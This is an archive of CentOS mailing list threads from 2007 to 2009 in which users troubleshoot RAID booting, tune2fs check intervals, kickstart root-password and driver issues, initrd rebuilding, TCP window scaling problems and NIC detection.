___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] DMA mode

2008-06-02 Thread Linux
On Mon, Jun 2, 2008 at 6:22 PM, David Mackintosh
<[EMAIL PROTECTED]> wrote:
> ...which I think is because the IDE controller isn't really
> recognized, or is pretending to be a SATA controller:

For my cruiosity, what is your current kernel version?
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] preferred software RAID 10?

2008-07-18 Thread Linux
On Fri, Jul 18, 2008 at 4:15 AM, David Mackintosh
<[EMAIL PROTECTED]> wrote:
> To get back to the OP: I've done a RAID-10 under CentOS, and the
> problem I encountered was that the kernel wasn't smart enough to
> assemble the RAID without a properly populated /etc/mdadm.conf file.

Well, I have many working configurations with 4 disk cheap machines.
Guess I should say something.

/sd[abcd]1: 20 GB, ext3, RAID-1 as /dev/md0, linux-raid autodetect
(type: fd), boot flag active, mounted as "/" (incl. /boot)
/sd[abcd][23...]: whatever you want

I installed grub like this:

grub> device (hd0) /dev/sda  [repeat these 3 steps for all disks respectively]
grub> root (hd0,0)
grub> setup (hd0)

And this is from my grub.conf

"kernel /boot/2.6./bzImage root=/dev/md0"

Kernel updates etc does not cause any problems. I only update
grub.conf and bzImage file and reboot.

You should compile raid-related stuff in kernel directly (not modules)
and set raid partitions to "fd", this way, you do not need any
mdadm.conf or related stuff.

I had many recovery nightmares. Once, one system survived with "sdc"
only because of electricity. It seems no use but I had a chance to
change failed disks, rebuild my unrecoverable raid10 which was on
second part and restore backups without reinstalling operating system.
It depends on mainboard, SATA controller and may be disks but usually
modern hardware recovers hard errors and somehow continues with
working disks despite some bus-speed penalty.

If I missed something and repeated meaningless facts, sorry for being
lazy to read the thread from beginning...

Thanks.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] max mount count incovenient

2008-01-08 Thread Linux Man
Hello group
I added a new partition in fstab, and works without a problem.
I used mkfs.ext3 to create the partition.
My problem is that every 26 boots, the system tells that the partition
have no been checked since 26 systems boots, ant start to check my new
partition. This is a lot of time consuming, and always is in a bad
time.
There some way to do the check in a controlled time? i.e. do it the
check before 26 system boot, when the time is no problem.
Thanks a lot
Best regards
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] max mount count incovenient

2008-01-08 Thread Linux Man
I read that man page before, but had not seen anything useful, shame on me :(
Do you say, for example, change mount count with tune2fs?
Thanks a lot
Best regards

2008/1/8, Chris Mauritz <[EMAIL PROTECTED]>:
> Linux Man wrote:
> > Hello group
> > I added a new partition in fstab, and works without a problem.
> > I used mkfs.ext3 to create the partition.
> > My problem is that every 26 boots, the system tells that the partition
> > have no been checked since 26 systems boots, ant start to check my new
> > partition. This is a lot of time consuming, and always is in a bad
> > time.
> > There some way to do the check in a controlled time? i.e. do it the
> > check before 26 system boot, when the time is no problem.
> > Thanks a lot
> >
>
> The answers you seek can be found by reading the tune2fs man page.  :)
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] max mount count incovenient

2008-01-08 Thread Linux Man
Works great! thanks to all !! :)

It's a good choice to force be checked at boot time the partition "/"?


2008/1/8, Linux Man <[EMAIL PROTECTED]>:
> I read that man page before, but had not seen anything useful, shame on me :(
> Do you say, for example, change mount count with tune2fs?
> Thanks a lot
> Best regards
>
> 2008/1/8, Chris Mauritz <[EMAIL PROTECTED]>:
> > Linux Man wrote:
> > > Hello group
> > > I added a new partition in fstab, and works without a problem.
> > > I used mkfs.ext3 to create the partition.
> > > My problem is that every 26 boots, the system tells that the partition
> > > have no been checked since 26 systems boots, ant start to check my new
> > > partition. This is a lot of time consuming, and always is in a bad
> > > time.
> > > There some way to do the check in a controlled time? i.e. do it the
> > > check before 26 system boot, when the time is no problem.
> > > Thanks a lot
> > >
> >
> > The answers you seek can be found by reading the tune2fs man page.  :)
> > ___
> > CentOS mailing list
> > CentOS@centos.org
> > http://lists.centos.org/mailman/listinfo/centos
> >
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] Stage2.img

2007-08-28 Thread semi linux
I've got a RAID card (3ware 9650SE-2LP) that wasn't supported by the
in-kernel driver until 2.6.19+

Since CentOS 5.0 is based on 2.6.18-8.el5 is was looking for a way to
incorporate their driver from the website so I wouldn't have to use
the "linux dd" kernel option all the time. (trying to automate as much
as possible using kickstart, scripts, etc).

Through reading about other OSes I've found that the most common way
to do this would be to modify the stage2.img file on the boot DVD and
add the driver to the boot kernel image.  The problem is, I can't
mount the stage2.img file using cramfs.

# mount -o loop -t cramfs stage2.img /mnt
mount: wrong fs type, bad option, bad superblock on /dev/loop0,
   missing codepage or other error
   In some cases useful info is found in syslog - try
   dmesg | tail  or so

Any suggestions? or should I try going about this another way?

- G
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Stage2.img

2007-08-28 Thread semi linux
Good call...  I had thought of that but had assumed it would only
present me the same options as anaconda does (all local - hdx and/or
fdx)... as it turns-out, the --source=http:// could work nicely...
I'll give it a shot.

Just out of curiosity though, what is the process for mounting /
recreating CentOS 5 stage2.img?  It's obviously different from the old
ones... is this documented anywhere?

Thanks!
- G.

On 8/28/07, Karanbir Singh <[EMAIL PROTECTED]> wrote:
> semi linux wrote:
> > Since CentOS 5.0 is based on 2.6.18-8.el5 is was looking for a way to
> > incorporate their driver from the website so I wouldn't have to use
> > the "linux dd" kernel option all the time. (trying to automate as much
> > as possible using kickstart, scripts, etc).
>
> you can use the dd option in kickstart as well
>
> --
> Karanbir Singh : http://www.karan.org/ : [EMAIL PROTECTED]
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Stage2.img

2007-08-29 Thread semi linux
On 8/28/07, Karanbir Singh <[EMAIL PROTECTED]> wrote:
> semi linux wrote:
> > Good call...  I had thought of that but had assumed it would only
> > present me the same options as anaconda does (all local - hdx and/or
> > fdx)... as it turns-out, the --source=http:// could work nicely...
> > I'll give it a shot.
> >
> > Just out of curiosity though, what is the process for mounting /
> > recreating CentOS 5 stage2.img?  It's obviously different from the old
> > ones... is this documented anywhere?
> >
> > Thanks!
> >     - G.
> >
> > On 8/28/07, Karanbir Singh <[EMAIL PROTECTED]> wrote:
> >> semi linux wrote:
> >>> Since CentOS 5.0 is based on 2.6.18-8.el5 is was looking for a way to
> >>> incorporate their driver from the website so I wouldn't have to use
> >>> the "linux dd" kernel option all the time. (trying to automate as much
> >>> as possible using kickstart, scripts, etc).
> >> you can use the dd option in kickstart as well
>
> firstly, dont top post.
>
> secondly, anaconda has lots of docs online all over the place now - specially 
> in
> the last year or so. and there are docs included inside the anaconda rpm too.

Not top posting (although I think this a preference more then a rule).

Let me clarify what I'm asking - What's different about the stage2.img
file distributed with CentOS 5.0?  The instructions found on the web
for 'hacking' this don't work as the file doesn't seem to be cramfs
and/or mountable.  Is it a different FS?

As suggested, I greped /usr/share/doc/anaconda-11.1.2.36 for any
mention of "stage2" and "cram" and all are irrelevant to this post.

- G.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] rootpw and graphical mode?

2007-09-04 Thread semi linux
Is there some kind of caveat to using the rootpw --iscrypted directive
and then specifying a graphical install?

I always seem to get the prompt coming up...
If I remove the graphical and do a text install, it works fine and if
I remove the --iscrypted  and put a plain-text password in there, it
works as well.

Any suggestions?

- G
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] Re: rootpw and graphical mode?

2007-09-04 Thread semi linux
Sorry, should have specified - I'm using kickstart to load my machine(s).

On 9/4/07, semi linux <[EMAIL PROTECTED]> wrote:
> Is there some kind of caveat to using the rootpw --iscrypted directive
> and then specifying a graphical install?
>
> I always seem to get the prompt coming up...
> If I remove the graphical and do a text install, it works fine and if
> I remove the --iscrypted  and put a plain-text password in there, it
> works as well.
>
> Any suggestions?
>
> - G
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Re: rootpw and graphical mode?

2007-09-05 Thread semi linux
On 9/5/07, Johnn Tan <[EMAIL PROTECTED]> wrote:
> semi linux wrote:
> > Sorry, should have specified - I'm using kickstart to load my machine(s).
> >
> > On 9/4/07, semi linux <[EMAIL PROTECTED]> wrote:
> >> Is there some kind of caveat to using the rootpw --iscrypted directive
> >> and then specifying a graphical install?
>
> I'm able to do this with no prompts.
>
> >> I always seem to get the prompt coming up...
> >> If I remove the graphical and do a text install, it works fine and if
> >> I remove the --iscrypted  and put a plain-text password in there, it
> >> works as well.
>
> What do you mean "remove the graphical" -- as far as I can
> tell, it's graphical by default. The absence of the word
> "text" means it'll do a graphical install.
>
> When you get a prompt, what is it asking for? Do you have a
> line for "auth" or "authconfig"? (In general, make sure you
> have all the required directives like "lang", "keyboard", etc.)
>
> johnn

"remove the graphical" means switch it back to "text".

Here is the relevant section of the kickstart: (does prompt for pw):

lang en_US
keyboard us
timezone America/Los_Angeles --utc
rootpw textpw
# rootpw --iscrypted ***
reboot
logging --level=debug
graphical
# text
install
autostep --autoscreenshot
driverdisk --type=ext2 --source=http:///3w9650SE-x86_64-9.4.1.1.img
url --url http://*/CentOS5
bootloader --location=mbr --append="[EMAIL PROTECTED]"
zerombr
clearpart --all --initlabel
part swap --recommended --ondisk=sda
part /boot --fstype "ext3" --ondisk=sda --size 200
part / --fstype "ext3" --ondisk=sda --size 10
auth  --useshadow  --enablemd5
network --bootproto=dhcp --device=eth0 --hostname=temp --onboot=yes --noipv6
firewall --disabled
selinux --disabled
xconfig --defaultdesktop=gnome --startxonboot --resolution=1024x768 --depth=32


If I uncomment these lines and re-comment their counterparts, then is prompts.
- The prompt is the default password prompt.
- The auth line is in there.
- I don't necessarily need graphical but it's a whole lot nicer due to
the screenshots provided


Any other hints or suggestions?
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Re: rootpw and graphical mode?

2007-09-07 Thread semi linux
For whatever reason, this just does not want to work for me...

I get my crypted password from the /etc/shadow file and copy it
directly into the ks file.
I've done this ~ 6-8 times now, resetting the root password, copying
it and trying to kickstart from it - no change.  (I thought  there was
only one right answer, but if I reset my password and type the same
thing, the crypted string changes slightly everytime.)

Anaconda still prompts me for the password no matter what.

If I change it to a plain text password, it works.
If I use the non-graphical install, it works.

I've even deleted the lines to make sure I don't have any special
characters in there...

The only thin I can think of is that maybe my crypted password
contains an escape sequence that might not be properly handled in
anaconda?

I'm completely stumped.

- G.

On 9/6/07, Johnn Tan <[EMAIL PROTECTED]> wrote:
> semi linux wrote:
> > Here is the relevant section of the kickstart: (does prompt for pw):
> >
> > lang en_US
> > keyboard us
> > timezone America/Los_Angeles --utc
> > rootpw textpw
> > # rootpw --iscrypted ***
> > reboot
> > logging --level=debug
> > graphical
> > # text
> > install
> > autostep --autoscreenshot
> > driverdisk --type=ext2 --source=http:///3w9650SE-x86_64-9.4.1.1.img
> > url --url http://*/CentOS5
> > bootloader --location=mbr --append="[EMAIL PROTECTED]"
> > zerombr
> > clearpart --all --initlabel
> > part swap --recommended --ondisk=sda
> > part /boot --fstype "ext3" --ondisk=sda --size 200
> > part / --fstype "ext3" --ondisk=sda --size 10
> > auth  --useshadow  --enablemd5
> > network --bootproto=dhcp --device=eth0 --hostname=temp --onboot=yes --noipv6
> > firewall --disabled
> > selinux --disabled
> > xconfig --defaultdesktop=gnome --startxonboot --resolution=1024x768 
> > --depth=32
> >
> >
> > If I uncomment these lines and re-comment their counterparts, then is 
> > prompts.
> > - The prompt is the default password prompt.
> > - The auth line is in there.
> > - I don't necessarily need graphical but it's a whole lot nicer due to
> > the screenshots provided
> >
> >
> > Any other hints or suggestions?
>
> Looks about right. Where are you getting the crypted root
> pw? Are you sure it's valid/complete?
>
> Other than that, I don't have any other suggestions.
>
> johnn
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] CentOS5 Network Problems

2007-09-20 Thread semi linux
I have a very odd problem connecting to some websites from my CentOS 5 box

Target websites:
www.connecttech.com
www.3ware.com
(two of my HW vendors)

I can usually get some kind of response, but if the content (download
or page itself) is larger in size (downloads never pass 100K), then it
hangs...

When I fire-up wireshark, I get a lot of ougoing highlighted Checksum
Errored packets but I don't know what's causing it...  Here's what
I've eliminated thus far:

- Websites are up and responsive
- Cable(s) is fine
- Network drop is fine
- I put myself behind a firewall to make sure it wasn't my network
- Network card has been switched
- Driver has been switched
- Removed any firewall
- wget has problems as well
- Other computers on the same network work fine.

Sites like maps.google.com work just fine...  I'm open to any
suggestion at this point.

I'm completely lost.

- G.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Re: CentOS5 Network Problems

2007-09-20 Thread semi linux
On 9/20/07, Scott Silva <[EMAIL PROTECTED]> wrote:
> semi linux spake the following on 9/20/2007 4:31 PM:
> > I have a very odd problem connecting to some websites from my CentOS 5 box
> >
> > Target websites:
> > www.connecttech.com
> > www.3ware.com
> > (two of my HW vendors)
> >
> > I can usually get some kind of response, but if the content (download
> > or page itself) is larger in size (downloads never pass 100K), then it
> > hangs...
> >
> > When I fire-up wireshark, I get a lot of ougoing highlighted Checksum
> > Errored packets but I don't know what's causing it...  Here's what
> > I've eliminated thus far:
> >
> > - Websites are up and responsive
> > - Cable(s) is fine
> > - Network drop is fine
> > - I put myself behind a firewall to make sure it wasn't my network
> > - Network card has been switched
> > - Driver has been switched
> > - Removed any firewall
> > - wget has problems as well
> > - Other computers on the same network work fine.
> >
> > Sites like maps.google.com work just fine...  I'm open to any
> > suggestion at this point.
> >
> > I'm completely lost.
> >
> > - G.
> Have you eliminated interference from electrical sources? Tried another
> computer on that cable?

Yep... my WinXP laptop is sitting right next to the machine and I can
switch the cable over to it w/o problem.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] CentOS5 Network Problems

2007-09-20 Thread semi linux
On 9/20/07, James A. Peltier <[EMAIL PROTECTED]> wrote:
> semi linux wrote:
> > I have a very odd problem connecting to some websites from my CentOS 5 box
> >
> > Target websites:
> > www.connecttech.com
> > www.3ware.com
> > (two of my HW vendors)
> >
> > I can usually get some kind of response, but if the content (download
> > or page itself) is larger in size (downloads never pass 100K), then it
> > hangs...
> >
> > When I fire-up wireshark, I get a lot of ougoing highlighted Checksum
> > Errored packets but I don't know what's causing it...  Here's what
> > I've eliminated thus far:
> >
> > - Websites are up and responsive
> > - Cable(s) is fine
> > - Network drop is fine
> > - I put myself behind a firewall to make sure it wasn't my network
> > - Network card has been switched
> > - Driver has been switched
> > - Removed any firewall
> > - wget has problems as well
> > - Other computers on the same network work fine.
> >
> > Sites like maps.google.com work just fine...  I'm open to any
> > suggestion at this point.
> >
> > I'm completely lost.
> >
> > - G.
> > ___
> > CentOS mailing list
> > CentOS@centos.org
> > http://lists.centos.org/mailman/listinfo/centos
>
> When you say network drop is fine does that mean from the switch to your
> computer?  Have you tried a different port on your switch?

I've used my laptop on the same network drop...
I've changed from port A to B in this cube and I've tried A and B in
the cube next to me... all four ports produce the same result with the
system but work fine with my laptop.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] CentOS5 Network Problems

2007-09-20 Thread semi linux
On 9/20/07, Joshua Baker-LePain <[EMAIL PROTECTED]> wrote:
> On Thu, 20 Sep 2007 at 4:31pm, semi linux wrote
>
> > I have a very odd problem connecting to some websites from my CentOS 5 box
> >
> > Target websites:
> > www.connecttech.com
> > www.3ware.com
> > (two of my HW vendors)
> >
> > I can usually get some kind of response, but if the content (download
> > or page itself) is larger in size (downloads never pass 100K), then it
> > hangs...
>
> I had an odd issue with an FC6 laptop on a hotel wireless network where
> any encrypted traffic (ssh, https) would hang after a certain amount.
> The fix was to turn off TCP window scaling
> (echo 0 > /proc/sys/net/ipv4/tcp_window_scaling).  Some googling revealed
> that some routers have issues with TCP window scaling - I don't know why
> it only affected encrypted traffic in my case, but the fix may be worth a
> shot for you.
>
> --
> Joshua Baker-LePain
> QB3 Shared Cluster Sysadmin
> UCSF

Wicked! that worked... How weird...  I'm going to have to look this up
and read about it... it seems weird that the kernel would have it on
by default if it's as common as it seems to me.

Thanks a million!

You don't happen to have any links of where you found this, do you?

- G
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Re: CentOS5 Network Problems

2007-09-21 Thread semi linux
On 9/21/07, Tony Mountifield <[EMAIL PROTECTED]> wrote:
> In article <[EMAIL PROTECTED]>,
> Joshua Baker-LePain <[EMAIL PROTECTED]> wrote:
> > On Thu, 20 Sep 2007 at 5:04pm, semi linux wrote
> >
> > > Wicked! that worked... How weird...  I'm going to have to look this up
> > > and read about it... it seems weird that the kernel would have it on
> > > by default if it's as common as it seems to me.
> > >
> > > Thanks a million!
> > >
> > > You don't happen to have any links of where you found this, do you?
> >
> > Here's one:
> >
> > http://lwn.net/Articles/92727/
> >
> > Bottom line is that the behavior is a result of broken routers, and the
> > kernel leaves it enabled because it *should* work.
>
> Would be interesting to know what make/model of router the original poster
> is using, that exhibited this problem, and which firmware version.
>
> Unless the problem is in his ISP
>
> Cheers
> Tony

It's further up the line... remember, some websites work, others
don't... I suppose it depends on the amount of data coming from the
remote site, but everything internal works great and the bigger sites,
like google, yahoo, mapquest, etc. all work fine... it's the smaller
sites that I had problems with...  Believe me, I wish I knew when this
problem was but I don't think it's any of the networking gear here in
the office...

Thanks to everyone who replied... I would have been searching for
weeks on this one.

- G.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] Waking up X

2007-09-26 Thread semi linux
I just finished installing CentOS 5 (again)... and I'm having trouble
with my X config (I _think_).

If I 'startx' then switch to a console (using CTRL+ALT+F*) and then
back to X (CTRL+ALT+F7), 1/2 the time it comes back, the other half I
get a black screen and I can never recover the session.

X is still running (CTRL+ALT+Backspace kills it) but there seems to be
some type of power saving or screensaver that kicks in and won't let
the session restore...

Any hints on where to look?  The X logs don't _seem_ to show anything...

- G.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Waking up X

2007-09-27 Thread semi linux
On 9/27/07, Bart Schaefer <[EMAIL PROTECTED]> wrote:
> On 9/26/07, semi linux <[EMAIL PROTECTED]> wrote:
> > I just finished installing CentOS 5 (again)... and I'm having trouble
> > with my X config (I _think_).
> >
> > If I 'startx' then switch to a console (using CTRL+ALT+F*) and then
> > back to X (CTRL+ALT+F7), 1/2 the time it comes back, the other half I
> > get a black screen and I can never recover the session.
>
> Under normal circumstances with a CentOS 5 install you should not need
> to run "startx" because GDM will already be running on console F7.
> Did you do something to disable GDM?  If not, might it be that you
> have two X11 sessions battling for the same virtual console?

I'm running a highly customized kickstarted install... GDM and a bunch
of other daemons/servers are turned off... there is no other X running
before I type startx thanks for the suggestion though - I hadn't
actually thought of that one.

- G.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Re: rootpw and graphical mode?

2007-10-02 Thread semi linux
Sorry for the delay - I got pulled off to another cirtical project for
a while.  Thanks for the info on crypt guys...

I still haven't solved this problem... I've tried mulitple different
copies of the string - and it is the complete string.  The next thing
I'm going to try is a different password altogether... are there any
other suggestions?

- Gareth

On 9/7/07, Johnn Tan <[EMAIL PROTECTED]> wrote:
> semi linux wrote:
>  > The only thin I can think of is that maybe my crypted
> password
>  > contains an escape sequence that might not be properly
> handled in
>  > anaconda?
>
> The crypted password might end on a character like '/' or
> '.' -- are you grabbing the complete string?
>
> johnn
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] Anaconda Partial Freeze...

2007-10-02 Thread semi linux
Hey,

I'm trying to run a kickstart script on a new piece of hardware...
I've never used this HW before, so it's possible that there may be
something faulty...

After the DVD boots, I type "linux ks=http://blah/blah.ks"; and hit enter.

Once I get to the anaconda line which says "running /sbin/loader", the
machine sits in a frozen state for a long time (3-5 minutes)...
anyone have any clue what's going on here?  Or at least how to debug
it?  It's too early to switch tot he other terminals, so I'm a little
lost.

I've tired testing the RAM and reseating, etc... nothing seems to works.

- G.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] Lan Kernel Problem

2007-10-22 Thread Linux Man
I'm building a Linux box to act as Proxy/Router/Firewall.
I'm using CentOS 4.5, with an "old" motherboard (Asus A8V-X), and two
Ethernet NIC, based on a realtek chip, that's widely supported under
2.4 and later kernel (the cards were functioning excellent in another
PC whit Fedora Core 1).
CentOS detects the on board LAN, but not the other two, in fact,
knoppix 5.0.1 doesn't detect too (kernel 2.6.17), but, Knoppix 5.1.1
(kernel 2.6.19) detects all three cards.
Do you have any idea why this behavior?
Centos 5.0 detects all three too, but I don't now why, my firewall
script (ipv4) doesn't work with this release.

Now, thank you very much!
Best Regards.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Lan Kernel Problem

2007-10-22 Thread Linux Man
No, it doesn't use that.
The "unusual" things that I use is Nat (S and D), and mark to support TC.

2007/10/22, Barry Brimer <[EMAIL PROTECTED]>:
> Quoting Linux Man <[EMAIL PROTECTED]>:
>
> > I'm building a Linux box to act as Proxy/Router/Firewall.
> > I'm using CentOS 4.5, with an "old" motherboard (Asus A8V-X), and two
> > Ethernet NIC, based on a realtek chip, that's widely supported under
> > 2.4 and later kernel (the cards were functioning excellent in another
> > PC whit Fedora Core 1).
> > CentOS detects the on board LAN, but not the other two, in fact,
> > knoppix 5.0.1 doesn't detect too (kernel 2.6.17), but, Knoppix 5.1.1
> > (kernel 2.6.19) detects all three cards.
> > Do you have any idea why this behavior?
> > Centos 5.0 detects all three too, but I don't now why, my firewall
> > script (ipv4) doesn't work with this release.
>
> By any chance does your firewall use '-m owner --cmd-owner' in it?
>
> Barry
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Lan Kernel Problem

2007-10-23 Thread Linux Man
Well, with lspci, the two NIC's are Realtek Semiconductor Co., Ltd.
RTL-28139/8139C/8139C+ (rev 10) and ADMtek NC100 Network Everywhere
Fast Ethernet 10/100 (rev 11), how can I know the kernel modules
asociated?
Thanks!


2007/10/23, Alain Spineux <[EMAIL PROTECTED]>:
> Look in your fedora fc1 or knoppix witch module was loaded for your two nic.
> Then try a
> # modprobe 
> then
> # dmesg
> to look if both nics where recognized.
> If so you have to update your modprobe.conf
>
> Alain
>
> Regards
>
>
>
> On 10/22/07, Linux Man <[EMAIL PROTECTED]> wrote:
> > I'm building a Linux box to act as Proxy/Router/Firewall.
> > I'm using CentOS 4.5, with an "old" motherboard (Asus A8V-X), and two
> > Ethernet NIC, based on a realtek chip, that's widely supported under
> > 2.4 and later kernel (the cards were functioning excellent in another
> > PC whit Fedora Core 1).
> > CentOS detects the on board LAN, but not the other two, in fact,
> > knoppix 5.0.1 doesn't detect too (kernel 2.6.17), but, Knoppix 5.1.1
> > (kernel 2.6.19) detects all three cards.
> > Do you have any idea why this behavior?
> > Centos 5.0 detects all three too, but I don't now why, my firewall
> > script (ipv4) doesn't work with this release.
> >
> > Now, thank you very much!
> > Best Regards.
> > ___
> > CentOS mailing list
> > CentOS@centos.org
> > http://lists.centos.org/mailman/listinfo/centos
> >
>
>
> --
> Alain Spineux
> aspineux gmail com
> May the sources be with you
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] powernow-k8 config

2007-10-24 Thread Linux Man
Hello
I'm building a router/proxy/firewall, the default governor is
ondemand, but for this application, what governor is best suited? (for
example conservative?)
Thanks at all!
Best regards
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] Re: powernow-k8 config

2007-10-24 Thread Linux Man
I forgot tell that the os is CentOS 5 i386
sorry

2007/10/24, Linux Man <[EMAIL PROTECTED]>:
> Hello
> I'm building a router/proxy/firewall, the default governor is
> ondemand, but for this application, what governor is best suited? (for
> example conservative?)
> Thanks at all!
> Best regards
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] How to create initrd.img

2007-11-12 Thread semi linux
On Oct 15, 2007 5:49 AM, Johnny Hughes <[EMAIL PROTECTED]> wrote:
> David Hrbáč wrote:
> > Hi,
> > anyone to point me URL on initrd.img creating? I have custom kernel and
> > want to create initrd.img for install media.
> > mkinitrd /tmp/initrd.img 2.6.18-8.1.14.el5.hrb -v -f create unusable
> > file for install media.
> >
>
> Personally, I just use the buildinstall process in /usr/lib/anaconda-runtime
>
> However, if you look at that script and follow it through into mkimages
> (and mk-images.x86 or mk-images-.x86_64) it will tell you how
> buildinstall issues the commands.
>
> Thanks,
> Johnny Hughes

Did you ever figure this command out?  I'm stuck doing the same thing
for FC4.  I'm going crazy reading through mk-images scripts.

- G.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] How to create initrd.img

2007-11-14 Thread semi linux
On Nov 13, 2007 5:49 AM, David Hrbáč <[EMAIL PROTECTED]> wrote:
> Alain Spineux napsal(a):
> > On Oct 15, 2007 2:09 PM, David Hrbáč <[EMAIL PROTECTED]> wrote:
> >> Hi,
> >> anyone to point me URL on initrd.img creating? I have custom kernel and
> >> want to create initrd.img for install media.
> >> mkinitrd /tmp/initrd.img 2.6.18-8.1.14.el5.hrb -v -f create unusable
> >> file for install media.
> >
> > Maybe you could extract original initrd image, replace its components
> > with yours and then rebuild the initrd !
> > gzip, mount -o are your friend
>
> Not anymore, use buildinstall.
> D.

David is right... Through a series of commands: cpio, mount, g(un)zip,
zcat, loopack devices, dd, mkfs.*, etc.  I was able to mount, extract
and otherwise rebuild the the initrd.  Sadly, after almost two months
of toying with it, I got to a point where I had my newly built kernel
booting, my newly minted initrd loading and a plethora of new drivers
loaded and ready for use.  BUT, after the kernel finished booting, the
hand-off to init (which is symlinked to loader/anaconda) would never
happen.  Although I was never able to figure-out why, I sent some
messages to the Fedora Release Engineering group.  Jesse Keating over
there pointed me back up the chain to buildinstall as well.  Although
cooking an _entier_ distro was overkill, using the resulting
diskboot.img and stage2.img worked great.  Seemingly, you can't
shortcut this route either - mk-images/.i386 really does the work I
need but taking it out of context is _way_ more trouble then it's
worth.  In any case, mystery solved!

Thanks for the help guys!
- G.

P.S.> It appears that the manual initrd rebuild used to work in FC2,
don't know about FC3, and won't work for FC4+... but this is just
speculation from my readings.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] how to run CentOS 8.2 under new WSL2?

2020-08-17 Thread Dev Linux
I want to run CentOS 8.2 (2004) under Windows 10 Pro (2004) that comes with
WSL2

1. Is there a list of steps anywhere, that would help me download what I
need, and get CentOS 8.2 running under WSL2?
2. What would I need to download? (need direct URL - there are so many
options for CentOS 8.2 , I am confused)
3. What steps would I need to take to get this running locally on my
Windows 10 machine?

Notes:
==> I don't want to run any existing CentOS available in the Windows store,
I want to roll my own
==> I don't want to run CentOS 8.2 under VirtualBox or any other
virtualization technology, just WSL2
==> I don't want to download any .zip from a previous release that is not
CentOS 8.2, ideally would like to be self-sufficient and gain the knowledge
on how to do this myself.

---
If anyone has actually done this with CentOS 8.2 and WSL2 and has it
working swimingly, please reply, would love to get this up and running for
a higher level of productivity, scripting and automation on my Windows dev
box.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos


[CentOS] Microsoft .mdb files in Open office

2009-11-23 Thread linux-crazy
Hi,

  Is there is anyway to Open Microsoft .mdb files in open office on
Centos 5.3 ?

Thanks
 linux
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] Anyone using fedora as guest/vm on Centos

2009-12-09 Thread Linux student
Hi folks,

I just want to know if someone have any experience with fedora installed
as guest/VM on Centos.

thanks.


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Anyone using fedora as guest/vm on Centos

2009-12-09 Thread Linux student
Neil Aggarwal on 2009-12-09 22:55 PM +0500, wrote :
>> I just want to know if someone have any experience with 
>> fedora installed
>> as guest/VM on Centos.
>> 
>
> Take a look at this page:
> http://www.linux-kvm.org/page/Guest_Support_Status
> for KVM support for specific guests.
>
> I hope this helps,
>   Neil
>   
Thanks.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Anyone using fedora as guest/vm on Centos

2009-12-09 Thread Linux student
Ray Van Dolson on 2009-12-09 22:52 PM +0500, wrote :
> On Wed, Dec 09, 2009 at 10:44:15PM +0500, Linux student wrote:
>   
>> Hi folks,
>>
>> I just want to know if someone have any experience with fedora installed
>> as guest/VM on Centos.
>>
>> thanks.
>> 
>
